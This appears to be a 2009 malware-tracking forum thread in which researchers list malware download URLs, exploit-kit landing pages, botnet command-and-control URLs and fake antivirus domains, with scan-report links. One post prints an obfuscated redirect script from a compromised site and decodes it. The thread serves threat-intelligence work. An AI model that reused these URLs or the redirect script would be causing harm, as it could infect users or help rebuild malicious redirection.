http://aaqkweoslz.com/progs/royyl/yhrrrrsfob
http://adimsceibh.com/progs/royyl/clmvviwj.php
http://adimsceibh.com/progs/royyl/cyiivvvjjw.php
http://adimsceibh.com/progs/royyl/ggcqqdde.php
http://adimsceibh.com/progs/royyl/kqddj.php
http://adimsceibh.com/progs/royyl/lvreefo.php
http://adimsceibh.com/progs/royyl/wspcpq.php
http://adimsceibh.com/progs/royyl/yhrrrrsfob
http://bazrvxedfe.net/aasuper0.php
http://bazrvxedfe.net/aasuper1.php
http://bazrvxedfe.net/aasuper2.php
http://bazrvxedfe.net/aasuper3.php
http://bddanhdnfl.net/aasuper0.php
http://bddanhdnfl.net/aasuper1.php
http://bddanhdnfl.net/aasuper2.php
http://bddanhdnfl.net/aasuper3.php
http://bhlmxnopqc.net/loaderadv563.exe
http://beelposttraning.ru/s/default.cgi
http://beelposttraning.ru/s/in.cgi?3
http://aksajans.com/1/6244.exe
http://aksajans.com/1/nfr.exe
http://aksajans.com/1/pp.06.exe
http://www.361safae.cn/img/sri1.gif
http://www.361safae.cn/img/sri2.gif
http://www.361safae.cn/img/sri3.gif
http://www.361safae.cn/img/sri4.gif
http://www.361safae.cn/img/sri5.gif
http://www.361safae.cn/img/sri6.gif
http://www.361safae.cn/img/sri7.gif
http://www.361safae.cn/img/sri8.gif
http://www.361safae.cn/img/sri9.gif
http://jump1.info/xxx.exe
http://xxx.host800.com/xxx.exe
http://imageempires.com/perce/8020ac6db14a14e0ed94c17da86c8d0938cff0c02ba29014aee9a81000a9b998de6c0f98a422879eb/400/perce.jpg http://picturesoffline.com/item/60b08c6de14a64b07d04519db83c3dc948ef80e0bbf2e054ae09d830c0194928cecc8fb814f2678e0/b01/item.gif
http://pictureswall.com/werber/b0f/216.jpg
http://89.149.227.200/item/1090.exe
http://89.149.227.200/item/1091.exe
http://89.149.227.200/item/1092.exe
http://89.149.227.200/item/1093.exe
http://89.149.227.200/item/1094.exe
http://89.149.227.200/item/1095.exe
http://89.149.227.200/item/1096.exe
http://89.149.227.200/item/1097.exe
http://89.149.227.200/item/1098.exe
http://89.149.227.200/item/1099.exe
-
Mebroot
http://ijpabevvif.com/ld/gnh_2/gnh2.exe
http://ijpabevvif.com/ld/gnh_3/gnh3.exe
http://ijpabevvif.com/ld/gnh_4/gnh4.exe
http://ijpabevvif.com/ld/gnh_5/gnh5.exe
http://ijpabevvif.com/ld/gnh_7/gnh7.exe
http://ijpabevvif.com/ld/gnh_8/gnh8.exe
http://ijpabevvif.com/ld/gnh_9/gnh9.exe
http://ijpabevvif.com/ld/grg/grg.exe
hamm,they changed thier way of infection again?
-
hXXp://hugetopnano.cn:8080/index.php
downloads
flash.swf
http://www.virustotal.com/analisis/6a7c462458c96cc099cfb7e340e15562
readme.pdf
http://www.virustotal.com/analisis/cfc979bd7744a91c5f444c8f4c0375e2
-
KoobFace:
71.202.219.18/setup.exe
208.97.2.97/setup.exeTrojan:
yourelitehosting.ru/taskmgr.exehttp://www.virustotal.com/analisis/4b38b6888024000227a834d65b612365
Trojan:
5file.ru/vkphoto.exe http://www.virustotal.com/analisis/b4c968b1eb1f4fa95fa9eca46b09adeb
Trojan:
bureau.co.il/web/system.exehttp://www.virustotal.com/analisis/31e365b7f7c555b50d752a9eb118ce1a
Fake AV:
adware-help.com/promo/anti-virus-1.php?uid=70e191e0aaeac213213a62e4c05c9977the downloaded file:
installz.cn/stubfiles/70e19.exehttp://www.virustotal.com/analisis/b18edcbad2b207e305d789afb32cd4e6
-
hamm,they changed thier way of infection again?
Is strange yes, not sure what to make of it , see the iframes launch but nothing happens, then I can fetch binary locally using a direct link.
Maybe they know who i am by now. :'(
-
redirects to rogue:
gorankscan.com
Fake AV:
scanlux4.info
pornproductions09.com/scan/?id=268
and the d/l file:
pornproductions09.net/codec.exehttp://www.virustotal.com/analisis/51f9f528c0444f84faa229177660ed09
Mebroot:
hiyuxngvif.com/cgi-bin/index.cgi?dxhttp://wepawet.cs.ucsb.edu/view.php?hash=8cadb9cae57538f219069c6cb2d44555&t=1242183318&type=js
-
While checking some old LuckySploit URL, the following popped up instead:
hxxp://addobeflashplayer.net/update/?promoid=FbU9dTs
hxxp://addobeflashplayer.net/update/?promoid=Ve8Tnv4
With installer at:
hxxp://addobeflashplayer.net/get/flashplayer/current/install_flash_player.exe
http://www.virustotal.com/analisis/3185d068ff2871765328dcdc86d7affc
-
Koobface:
75.137.70.87/setup.exe
174.0.8.174/setup.exehttp://www.virustotal.com/analisis/06202d4e1ceb674f95435d05bcc6149f
Exploit/trojan:
luks5.cn/index.phphttp://wepawet.iseclab.org/view.php?hash=c7a0e50c37e35c290324455c17b4b27e&t=1241763932&type=js
Exploit/trojan( wepawet gives invalid hostname)
usacaaugb.cn/life/index.phpPDF anlysis: http://wepawet.iseclab.org/view.php?hash=711a0cc4d481aa078c161179779310f1&type=js
-
exploits
rogkadej.cn/nuc/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=76a617d6921697f36d5d08f5fe163908&t=1242296838&type=js
trojan
rogkadej.cn/nuc/exe.phphttp://www.virustotal.com/analisis/be735f15770e8e06ebac50ec1bfafd40 7/40
-
redirect to exploits
bigbestfind.cn:8080/ts/in.cgi?pepsi4
hugepremium.cn:8080/ts/in.cgi?pepsi5
thebestyoucanfind.cn:8080/ts/in.cgi?pepsi3http://wepawet.cs.ucsb.edu/view.php?hash=e95003549c9b2d9c5cc9388f2056d9bc&t=1242302241&type=js
http://wepawet.cs.ucsb.edu/view.php?type=js&hash=53ddc7d15d0b2c2083c09c15aff3593a&t=1242284850
http://wepawet.iseclab.org/view.php?hash=8e897a5695627f956885238acabfff04&t=1242296961&type=js
exploit
bigtopcabaret.cn:8080/index.phphttp://wepawet.cs.ucsb.edu/view.php?type=js&hash=53ddc7d15d0b2c2083c09c15aff3593a&t=1242284850
redirects to the already known autobestwestern.cn
formerly hosted at Zlkon and Eurohost LLC
autobestwestern.cn:8080/load.php?id=8http://www.virustotal.com/analisis/77e676047adcaeeb5b32187f346de431 9/41
-
http://internetsecuritymetrics.com/hitin.php?land=30&affid=01986
http://videoporntrue.net/pcdef.exe
-
www.loshaqe.com/sb.exehttp://www.virustotal.com/analisis/75e4162cf4b32e95418e9c9cb087f647 5/40
http://www.threatexpert.com/report.aspx?md5=3f451779cfd0dc44f54b8b10b658749f
www.loshaqe.com/ret.exehttp://www.virustotal.com/analisis/bea1ceb55fc01d3abc1c206f7aae4a31 14/39
downloader for DarkGT/IframeDollar
www.loshaqe.com/ins.exe
http://www.virustotal.com/analisis/26120869a3d862b46bf64e769f0fc32b 25/40
www.loshaqe.com/eg.exe
http://www.virustotal.com/analisis/a05691e95c2b074300ca8e075a69853b 11/40
-
Koobface:
71.8.59.249/setup.exeTrojan:
vexpen.jino.ru/file/bot.exehttp://www.virustotal.com/analisis/60c864a624b006b5c3a1e9875ae99c4a
Fake AV:
antvirushelpv1.com(download link aint working atm but will work soon i guess..)
securityhelpcenter.com/1/ (currently only have a link to the fake payment site at:
live-payment-system.com/buy.php?nh=1&id=
-
http://antvirushelpv1.com/download.php?id=2004
;)
Downloads: Install_2004.exe (132K)
Actually just came across it whilst researching a malicious URL in the Google results that redirected me to it;
qualitycollisionbodyshop.com/gkxtd/zunet/cadets.htm
You've got to load it with a Google referer string though, or it'll redir you to nothingsville courtesy of;
*****************************************************************
vURL Desktop Edition v0.3.7 Results
Source code for: http://qualitycollisionbodyshop.com/gkxtd/zunet/2.js
Server IP: 76.162.102.189 [ rev.opentransfer.com.189.102.162.76.in-addr.arpa ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 15 May 2009
Time: 04:22:43:22
*****************************************************************
eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,102,40,41,123,13,10,118,97,114,32,114,61,100,111,99,117,109,101,110,116,46,114,101,102,101,114,114,101,114,44,116,61,34,34,44,113,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,103,111,111,103,108,101,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,109,115,110,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,121,97,104,111,111,46,34,41,33,61,45,49,41,116,61,34,112,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,97,108,116,97,118,105,115,116,97,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,97,111,108,46,34,41,33,61,45,49,41,116,61,34,113,117,101,114,121,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,97,115,107,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,99,111,109,99,97,115,116,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,98,101,108,108,115,111,117,116,104,46,34,41,33,61,45,49,41,116,61,34,115,116,114,105,110,103,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,110,101,116,115,99,97,112,101,46,34,41,33,61,45,49,41,116,61,34,113,117,101,114,121,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,109,121,119,101,98,115,101,97,114,99,104,46,34,41,33,61,45,49,41,116,61,34,115,101,97,114,99,104,102,111,114,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,112,101,111,112,108,101,112,99,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,115,116,97,114,119,97,114,101,46,34,41,33,61,45,49,41,116,61,34,113,114,121,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,101,97,114,116,104,108,105,110,107,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,116,46,108,101,110,103,116,104,38,38,40,40,113,61,114,46,105,110,100,101,120,79,102,40,34,63,34,43,116,43,34,61,34,41,41,33,61,45,49,124,124,40,113,61,114,46,105,110,100,101,120,79,102,40,34,38,34,43,116,43,34,61,34,41,41,33,61,45,49,41,41,32,13,10,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,32,61,32,40,34,104,116,116,112,58,47,47,111,112,101,110,115,116,97,114,49,46,110,101,116,47,105,110,46,99,103,105,63,57,38,115,101,111,114,101,102,61,34,43,101,110,99,111,100,101,85,82,73,67,111,109,112,111,110,101,110,116,40,100,111,99,117,109,101,110,116,46,114,101,102,101,114,114,101,114,41,43,34,38,112,97,114,97,109,101,116,101,114,61,36,107,101,121,119,111,114,100,38,115,101,61,36,115,101,38,117,114,61,49,38,72,84,84,80,95,82,69,70,69,82,69,82,61,34,43,101,110,99,111,100,101,85,82,73,67,111,109,112,111,110,101,110,116,40,100,111,99,117,109,101,110,116,46,85,82,76,41,43,34,38,100,101,102,97,117,108,116,95,107,101,121,119,111,114,100,61,100,101,102,97,117,108,116,34,41,59,32,13,10,125,13,10,13,10,119,105,110,100,111,119,46,111,110,70,111,99,117,115,32,61,32,102,40,41));
Which decodes to;
function f(){
var r=document.referrer,t="",q;
if(r.indexOf("google.")!=-1)t="q";
if(r.indexOf("msn.")!=-1)t="q";
if(r.indexOf("yahoo.")!=-1)t="p";
if(r.indexOf("altavista.")!=-1)t="q";
if(r.indexOf("aol.")!=-1)t="query";
if(r.indexOf("ask.")!=-1)t="q";
if(r.indexOf("comcast.")!=-1)t="q";
if(r.indexOf("bellsouth.")!=-1)t="string";
if(r.indexOf("netscape.")!=-1)t="query";
if(r.indexOf("mywebsearch.")!=-1)t="searchfor";
if(r.indexOf("peoplepc.")!=-1)t="q";
if(r.indexOf("starware.")!=-1)t="qry";
if(r.indexOf("earthlink.")!=-1)t="q";
if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1))
window.location = ("http://openstar1.net/in.cgi?9&seoref="+encodeURIComponent(document.referrer)+"¶meter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=default");
}
window.onFocus = f()
/edit
http://www.virustotal.com/analisis/d3008ef63c7db98bc3da9b63a3e567d2
-
i actually can download it directly(
http://antvirushelpv1.com/download.php?id=2004)
-
You can, or can't?
/edit
It was the .js file on the domain that redirs to the rogue domain I had to supply the Google referer to btw, not the rogue domain ;)
-
You can, or can't?
/edit
It was the .js file on the domain that redirs to the rogue domain I had to supply the Google referer to btw, not the rogue domain ;)
;D
-
Redirects to exploits:
popyodiw.cn/s/in.cgi?10Koobface:
123.199.89.28/setup.exeTrojan:
ji-u.cn/506.exehttp://www.virustotal.com/analisis/9c37779c08a666084c8088a42b44bbf6
Trojan:
claremontfinance.org/voland.exehttp://www.virustotal.com/analisis/970e0653980bb5313e6f9bbf82b32cc7
Trojan:
photo-host.in/new/exe/5555.exehttp://www.virustotal.com/analisis/bc8cb44f6b8046208e130186e4b78098
Trojan:
091809.ru/main_.exehttp://www.virustotal.com/analisis/d82a419082bfcf5c716bb6388f3c9ad1
Trojan:
buzizoo2.com/15.05-fuck.exehttp://www.virustotal.com/analisis/b42234e7210ce0192855eb43c3121b49
Trojan:
213.171.222.30/codec.exehttp://www.virustotal.com/analisis/14e090fe72f0114a4181d7d0d1b5b8fd
-
exploits
numbersbulk.cn/in.phphttp://wepawet.cs.ucsb.edu/view.php?hash=ac1e4c06e172e7e6d75c8ac4c7ebb81d&t=1242647454&type=js
trojan
numbersbulk.cn/load.php?id=5http://www.virustotal.com/analisis/1b81c4c3f26c3b88d3721b61b0fe8f14 7/40
-
Exploit/trojan:
pimpalas.cn/yespdf/index.phphttp://wepawet.iseclab.org/view.php?hash=d8776172d856e083138ff2828f1c28ae&t=1242712689&type=js
Redirect to fake AV:
gogenscan.com
gozonescan.comFake AV:
fanscan4.info
miniscan4.info
scanlist6.com
luxscan4.info
-
pearch.net/in.cgi?7
redirects to
europpc.com/search.php?iw=1&links=
links redirect to
wplstr.net/in.cgi?20
redirects to fake system check
systemstabilityscan.com/5
starts download
http://adioro.com/download.php?aid=5
redirects to
dl1.adioro.com/get.php?track_id=5
downloads
dl1.adioro.com/distribs/5/registryoptimizer.exehttp://www.virustotal.com/de/analisis/99110a3a11c3cba50d7725b2453813ec 0/40
MD5...: fcd4b853dcea9d412fab09c66134058a
-
72.47.253.37
redirects to exploits:
hxxp://findbigbrother.cn:8080/ts/in.cgi?pepsi6
hxxp://bestwebfind.cn:8080/ts/in.cgi?pepsi11
hxxp://findyourbigwhy.cn:8080/ts/in.cgi?pepsi7
hxxp://findbigboob.cn:8080/ts/in.cgi?pepsi6
Wepawet (http://wepawet.iseclab.org/view.php?hash=ebb1fe9522a585973be68f770635d2dd&t=1242748332&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=1546ed48bdf651718cfd0174a82b6efb&t=1242685229&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=af9e734c0b248533c0f9075629d7f628&t=1242687499&type=js)
The latest has no report (too many submissions for wepawet since hours)
-
redirects to exploits
91.212.41.119
hxxp://silzefos.cn/s/in.cgi?13
Wepawet (http://wepawet.iseclab.org/view.php?hash=ac168dc0c36f802d46ca35394f32d439&t=1242719638&type=js)
Registrant: Meng Qun / janglkd@ yeah.net
exploits / trojan
221.5.74.52
hxxp://profit-marketing.net/earningn/t.php
hxxp://profit-marketing.net/earningn/ll.php?b=2&s=snaj
hxxp://profit-marketing.net/earningn/ll.php?b=1&s=Co11ab
hxxp://profit-marketing.net/earningn/ll.php?b=1&s=ODAY
hxxp://profit-marketing.net/earningn/ll.php?b=1&s=Ut1l
hxxp://profit-marketing.net/imocs.swf
hxxp://profit-marketing.net/inocs.pdf
Registrant: Michell.Gregory2009@ yahoo.com
Wepawet (http://wepawet.iseclab.org/view.php?hash=c813e5a5f4a61be58a0e14d1d805d78e&t=1242583611&type=js) (exploit)
VirusTotal (http://www.virustotal.com/analisis/664aeb722b7908da6cbd8d75c472feb2) (flash) - 3/39 (7.69%)
Wepawet (http://wepawet.iseclab.org/view.php?hash=349deac830735bacff1d9d14c159498f&type=js) (flash)
VirusTotal (http://www.virustotal.com/analisis/9153dbcad1da90126ef4cb18b2507693) (pdf) - 7/39 (17.95%)
VirusTotal (http://www.virustotal.com/analisis/fdbf2a14b8135705d740bc9ffa931074) (exe) - 3/39 (7.69%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=15a74956aa17d20f49dfd3c701287cc93&call=first)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=aa09ec5696ee8105d36a31d370d3a606)
Botnet C&C:
213.182.197.249
hxxp://krottorot.cn/ging/controller.php?action=bot&entity_list=&uid=&first=1&guid=1824245000&rnd=946862
hxxp://krottorot.cn/ging/controller.php?action=report&guid=0&rnd=946862&uid=&entity=1241486361:unique_start
Source: Anubis (http://anubis.iseclab.org/?action=result&task_id=15a74956aa17d20f49dfd3c701287cc93&call=first)
Registrant: Chen / chen.poon1732646@ yahoo.com
Botnet C&C:
78.129.166.5
hxxp://ftpshki.cn/admin/controller.php?action=bot&entity_list=&uid=1&first=1&guid=1824245000&rnd=2514213
hxxp://ftpshki.cn/admin/controller.php?action=report&guid=0&rnd=25142137&uid=1&entity=1238216956:unique_start
hxxp://ftpshki.cn/admin/receiver/online
Source: Anubis (http://anubis.iseclab.org/?action=result&task_id=1c8ae7bb70a466f64d5ed8f74df829bfe&format=html)
Registrant: SmithJohn / Chehhost@ admin.ru
-
91.209.163.201 - vl01.c76.fvtn.net
hxxp://download.official-emule.com/Live-Player_setup.php
hxxp://download.original-solitaire.com/Live-Player_setup.php
91.209.163.202 - vl02.c76.fvtn.net
hxxp://download.go-turf.com/Live-Player_setup.php
hxxp://download.gomusic.com/Live-Player_setup.php
hxxp://download.littlesmileys.com/Live-Player_setup.php
hxxp://download.official-bittorrent.com/Live-Player_setup.php
hxxp://download.schnellsucher.com/Live-Player_setup.php
hxxp://download.search-solver.com/Live-Player_setup.php
hxxp://download.smilymail.com/Live-Player_setup.php
hxxp://download.trovarapido.com/Live-Player_setup.php
hxxp://download.web-mediaplayer.com/Live-Player_setup.php
91.209.163.203 - vl03.c76.fvtn.net
hxxp://download.backstripgirls.com/Live-Player_setup.php
hxxp://download.buscalisto.com/Live-Player_setup.php
hxxp://download.games-attack.com/Live-Player_setup.php
hxxp://download.go-astro.com/Live-Player_setup.php
hxxp://download.gomusic.net/Live-Player_setup.php
hxxp://download.hot-tv.com/Live-Player_setup.php
hxxp://download.speed-downloading.com/Live-Player_setup.php
same file:
File size: 233000 bytes
MD5: 67a6bfee47f1e6c7d1c03d8c02df6b95
VirusTotal (http://www.virustotal.com/analisis/d01ac3e0cd1e08afc94cf0f79bd34489) - 12/40 (30%)
Registrant: Ramon Viladomiu / 2ffba9ee4ff19e8587163b873c03ff22-913471@ contact.gandi.net
related to: http://www.siteadvisor.com/sites/live-player.com (http://www.siteadvisor.com/sites/live-player.com)
-
filesstoragesarchive.com/softwarefortubeview.42002.exehttp://www.virustotal.com/analisis/e28f31c90582938ebfb7674f6136ad80 3/40
http://www.threatexpert.com/report.aspx?md5=f15dd0112f6f77dbce18d349dd65af79
-
Emold:
ku98.biz/ghost/dia.exehttp://www.virustotal.com/analisis/6e833596122310890ab85283b612aa02
Trojan:
rezident77.ru/files/cry.exehttp://www.virustotal.com/analisis/860b0c60fcc25b00b58075cff3492cd8
Koobface:
121.13.55.49/setup.exe
79.181.99.78/setup.exe
-
Trojan:
samog0n.info/analyse/3xNt0f6b9e3R.exehttp://www.virustotal.com/analisis/3f6196088309178a7ced521f2ac381c0
Trojan:
tamporn.net/indir.exe http://www.virustotal.com/analisis/33ac4a6f5025b70f407812c3637cb084
Trojan
yourelitehosting.ru/explorer.exehttp://www.virustotal.com/analisis/b8fcb40a031230efbfaa9b3e0ff6e8a9
Redirects to rogue:
spyware-systems.info/0/go.php?sid=2 Exploit/trojan:
dr-w-corporation.ru/404/cache/readme.pdfhttp://wepawet.iseclab.org/view.php?hash=ceda3c3478def91606b1f1eff10aee05&t=1242931942&type=js
-
redirects:
hxxp://tvnameshop.cn:8080/ts/in.cgi?pepsi19
exploits:
hxxp://litetopseeksite.cn:8080/index.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=11608bcd2beae11a346c7ce59dc1b66a&t=1243207563&type=js)
pdf:
hxxp://litetopseeksite.cn:8080/cache/readme.pdf
VirusTotal (http://www.virustotal.com/analisis/e0cc1067f80918d270ff280f5118f8d4c5d1f59a99ce9329aadafa8c859e8e0c-1243207236) - 10/40 (25.00%)
Wepawet (http://wepawet.iseclab.org/view.php?hash=95c738bfe5a01b4cc30415d9368e2f9d&t=1243207896&type=js)
flash:
hxxp://litetopseeksite.cn:8080/cache/flash.swf
VirusTotal (http://www.virustotal.com/analisis/1feb0cc84665dfab4ebf8bf123ea106cbefc0967e7d0446a003c4411a5d4b42f-1243207241) - 11/39 (28.21%)
exe:
hxxp://litetopseeksite.cn:8080/load.php
VirusTotal (http://www.virustotal.com/analisis/284a014530738b8df40ad37d145eb3e1a547e51cb47461ee469269fa4df12fcb-1243207094) - 2/39 (5.13%)
Registrant: Scott Bell / ScottKBell@ missiongossip.com
Registrant: Michelle Rea / rea@ cybernauttech.com
-
few trojans:
contempt.fileave.com/update.exehttp://www.virustotal.com/analisis/a9611719a2debd0ce94827725344b924b59a7dceb3b88a5a7373e63b21ea3a4a-1243232016
contempt.fileave.com/install_flash_player.exehttp://www.virustotal.com/analisis/7a0c6497ed0fedc5eb92b63f7c79d9f6fddaf93d6dcc92bb8c869bc9da354aa9-1243232028
contempt.fileave.com/update!!.exehttp://www.virustotal.com/analisis/eb6312bd3a633c4dc29bd3c6a8ed818034da1f9b619ef71e0beb549c4560dea8-1243232049
ebnetwork.biz/bot.exehttp://www.virustotal.com/analisis/36e867e35665340c782c1d029d4f812e78a2c1b9b06c8f65e11aa4ecf249efc2-1243232229
Koobface:
82.120.80.136/setup.exe
72.26.145.118/setup.exe
Exploit/trojan Murlo:
usrvzi.ruhttp://wepawet.iseclab.org/view.php?hash=07cb0602a03e0538ce9e630d5881e8d2&t=1243233325&type=js
Fake AV loader:
stroika2009.ru/porn-tube.avi.exe
http://www.virustotal.com/analisis/15d4ed789d3872463614ff54804ddebc07ae67ea6ab44efd80937ede4f33191d-1243233171
Fake AV:
pornotubeonline10.com/scan/Fake payment site:
2payon.com/pp/?id=356
-
Trojan Emold:
interepass.com/ldr/main.exehttp://www.virustotal.com/analisis/49925c768805484b4fcd2eb62d0d72765b7b40c62cbe6cceaad4d2187eaac444-1243317300
Trojan:
89.149.242.25/cc/rf5.exehttp://www.virustotal.com/analisis/6626bc1283eb86b9afdf73ee4a24be67734fb0be1c81dda3e7d3731f77064c30-1243311118
Trojan:
us18.ru/d/1.exehttp://www.virustotal.com/analisis/21c89616b4b86dff6e1edf71c301a516b0dd477811bf7398a38743868a24e7db-1243311158
Trojan
pizdhelp.com/codec.exe
loyalbox.biz/codec.exehttp://www.virustotal.com/analisis/3f952397ee3a0fab7f828977e96d278be7e60f43de6f495c1fb7e7579cfcf616-1243317473
Fake av scan:
porno-online-tube.com/scan/
note4scan.info
greattoolset.com
Fake AV:
dwnld.showpromo-offer.com/secure/069d079c64e0350e7ba812895655fbf0/4a1b65bd/srm/srm_free_setup.exehttp://www.virustotal.com/analisis/af072ce2b07e627e27035e85bfd0ab74ac9de16b8166ef40d4b11455ecbe1b7e-1243317795
Redirects to fake AV:
trafdriver.com/in.cgi?10
Exploit/trojan:
freehostwap.com/in.phphttp://wepawet.iseclab.org/view.php?hash=d89affb2687f08a4310d2e29a79d0b0f&t=1243320248&type=js
-
PDF:
http://92.60.176.45/s/getfile.php?f=pdf
[5/39]
http://www.virustotal.com/analisis/c958c661bc404cd8f82ccad7143b82937eeebafd27226e80feef3b5ddd92ec99-1243341305
Trojan/dropper:
http://92.60.176.45/s/getexe.php?h=1
[7/39]
http://www.virustotal.com/analisis/e1b5d1b5c13891d274ec6fe17a405ec234a2368b2ee5720c4d53a508ff359465-1243341362
-
Rogue Application related domains:
Angantivirus09.com
Ang-antivirus09.com
Angantivirus09.info
best-protect-av1.info
download.best-protect-av1.info
securityonlinesite.com/hitin.php?land=20&affid=20100
-
Exploit/trojan:
leosex.org/nn/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=eb94cbec20844957ee85c8e95f272dfc&t=1243391424&type=js
Trojan(seemed like virut to me)
ileron.cn/dll/abb.txthttp://www.virustotal.com/analisis/452e31c95952af674501a0519e63741568a1a3ba6267abc559b461812d761b70-1243392178
Trojan:
ileron.cn/dll/em.txthttp://www.virustotal.com/analisis/9b9871886640affa7fa13ebcb404540b10c862c9bf88372b184060f8eb2d1c37-1243392469
-
Fake AV:
truesafetyweb.com
securityonlinesite.com
-
70.85.142.250 - fa.8e.5546.static.theplanet.com
redirects:
thefilmmusic.cn:8080/ts/in.cgi?pepsi16
mynewnameshop.cn:8080/ts/in.cgi?pepsi25
usednamestore.cn:8080/ts/in.cgi?pepsi23
namebuyfilmlife.cn:8080/ts/in.cgi?pepsi23
mediahomenameshoppicture.cn:8080/ts/in.cgi?pepsi17
homenameworld.cn:8080/ts/in.cgi?pepsi17
technologybigtop.cn:8080/ts/in.cgi?pepsi17
exploits / trojan:
litetopdiscoversite.cn:8080/index.php
litetopdiscoversite.cn:8080/load.php
litetopfinddirect.cn:8080/index.php
litetopfinddirect.cn:8080/load.php
-
PDF exploit:
cutlot.cn/cache/readme.pdfhttp://wepawet.iseclab.org/view.php?hash=175471e264f45086cc76d243f2d434da&t=1243755537&type=js
Flash exploit:
cutlot.cn/cache/flash.swfhttp://wepawet.iseclab.org/view.php?hash=b3b47f2539fcd19831f1b69463f463aa&type=swf
the downloaded trojan(0 detection on VT)
bestlitediscover.cn:8080/landig.php?id=8http://www.virustotal.com/analisis/cbdc2ddd3d050e55863f645efe12a3b55abec042a8d4f638788669e6431683b3-1243839114
communicates with
78.109.29.116/new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=606178701&rnd=981633 (on MDL)
www.zbbey.com/n/http://wepawet.iseclab.org/view.php?hash=47f6d25611621daf759de1bf372b9633&t=1243757577&type=js
PDF exploit:
www.zbbey.com/n/spl/pdf.pdfhttp://wepawet.cs.ucsb.edu/view.php?type=js&hash=15b110fd28204a9b64716abda5cd6db5&t=1243757463
the downloaded trojan:
zbbey.com/n/exe.phphttp://www.virustotal.com/analisis/11d539235f368547b20854cbbcfadee90c4c71d4c8a9e78fa6f6011b30f3f423-1243850579
Few trojans:
www.mcdonaldsuck.com/e/eg.exehttp://www.virustotal.com/analisis/6471bb8364de0ffc7775daa615631d226030280bcd4b8da40cb6ad8058e7b8b2-1243840368
www.mcdonaldsuck.com/e/sb.exehttp://www.virustotal.com/analisis/6ab0ac53f3c91abe493b9423fe71bb6f57ba728a9dd7f888d85ed117c4fe78ca-1243840496
www.mcdonaldsuck.com/e/238.exehttp://www.virustotal.com/analisis/097d7a0907216b6395f4e88a3b847cb15a17f4166367a7c2b42518dd3a4c8836-1243840661
www.mcdonaldsuck.com/e/ick.exehttp://www.virustotal.com/analisis/51f7ed9fa7f032ab1fd3acf7fc2eef55c62b15128b46d697405d67778093286a-1243840855
www.mcdonaldsuck.com/e/lich.exehttp://www.virustotal.com/analisis/ac62cbe52183d6f60f683548dde10dd1ba814fcab8ccc6aa3beadfb646c46bb7-1243841074
sotana.su/1.exehttp://www.virustotal.com/analisis/cb70d5e0ba1425ca49142a598528617846834aab9129677060d3568485d69080-1243841368
sexiland.ru/1.exehttp://www.virustotal.com/analisis/2a6c671dad587a06a18e751a3f22a0eb1659f73f915ec307dd65e2d59a5ae3c2-1243841184
sexiland.ru/bot.exehttp://www.virustotal.com/analisis/dc9913c8a788ce33a063de0f8d73c0e214eef3c6e63fc7a99fb8eff007f0cf06-1243841240
claremontfinance.org/voland.exehttp://www.virustotal.com/analisis/fc2c189b3242075ee4944afd6f4b60b7852dd73eea412ee20366cb082b16340d-1243841664
business-networks.info/data/images/ftp.exehttp://www.virustotal.com/analisis/eaa2a177b4e1b711b536a965bdf4bb1ba1eead4fca275dce6b124d5b87e9b824-1243841813
89.149.242.25/ededed3.exehttp://www.virustotal.com/analisis/76ef1bbe110c8ff041db0c67895d551769e9b85f08780c1242c6a2cc4026cdce-1243839486
Redirects to fake AV:
unmarine.info
powerball.3june2009.comFake AV:
counteringate.com/scan
loved-online-tube.com/scan/
first-antispyware.com/promo3/
the-best-antispyware.com/promo3/
-
Exploits:
search-adverts.net/forum/index.phphttp://wepawet.iseclab.org/view.php?hash=f2974b1a652fd3bc3fac456d5175e1ab&t=1243847198&type=js
PDF:
search-adverts.net/forum/cache/readme.pdfFlash:
search-adverts.net/forum/cache/flash.swfKoobface:
search-adverts.net/forum/load.php?id=4http://www.virustotal.com/analisis/199690f5a30c1d9ff7d267cce6f7bab4b98195bdc8963a40c03f5146163a96a9-1243504185
-
Rogue:
clean-windows-vista.com
registry-cleaner-2009.com/Setup.exe
Internet-explorer-cleaner.com/Setup.exe
registrycleanerpro.org/Setup.exehttp://www.virustotal.com/analisis/fa7bcca65a1c661f93a0a2d1031162e12a4c27d86f49686e65a02d40762f74f8-1243909438 (1/40)
The payment site(site seems legit and just offer it services):
plimus.com/jsp/buynow.jsp?contractId=2261798&templateId=678656
-
Few Trojans:
avhtm.8866.org/files/av.exehttp://www.virustotal.com/analisis/969c0f517f279dd68898eea50bb9ce51092acc3eca79fe963500b82f5c0d222a-1243923005
